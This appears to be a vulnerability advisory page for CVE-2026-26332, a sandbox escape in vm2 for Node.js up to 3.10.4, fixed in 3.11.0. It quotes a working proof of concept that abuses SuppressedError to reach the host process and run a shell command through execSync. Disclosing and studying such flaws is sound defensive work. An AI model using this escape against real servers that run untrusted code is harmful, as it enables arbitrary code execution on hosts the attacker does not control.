Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.

CVE-2026-26332: vm2 Sandbox Escape in Node.js Versions Prior to 3.11.0

CVE-2026-26332 GHSA-55hx-c926-fr95

Summary

A security issue in older versions of vm2 for Node.js allows attackers to break out of a secure environment and run their own code. This is a serious risk, especially for servers hosting untrusted code. To fix the issue, update to version 3.11.0 or later.

What to do

Update vm2 to version 3.11.0.

Affected software

Ecosystem	Vendor	Product	Affected versions
npm	–	vm2	<= 3.10.4 Fix: upgrade to 3.11.0

Original title

VM2 Has a Sandbox Escape Issue via SuppressedError

Original description

In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.

### PoC
```js
const { VM } = require("vm2");

const vm = new VM();

vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
const e = Error();
e.name = Symbol();
e.stack;
});
try {
ds.dispose();
} catch(e) {
const Function = e.suppressed.constructor.constructor;
const process = new Function("return process;")();
const { execSync } = process.mainModule.require("node:child_process");
execSync("echo pwned", { stdio: "inherit" });
}
`);
```

nvd CVSS3.1 9.8

Vulnerability type

CWE-94 Code Injection

CWE-693 Protection Mechanism Failure

Published: 5 May 2026 · Updated: 28 May 2026 · First seen: 4 May 2026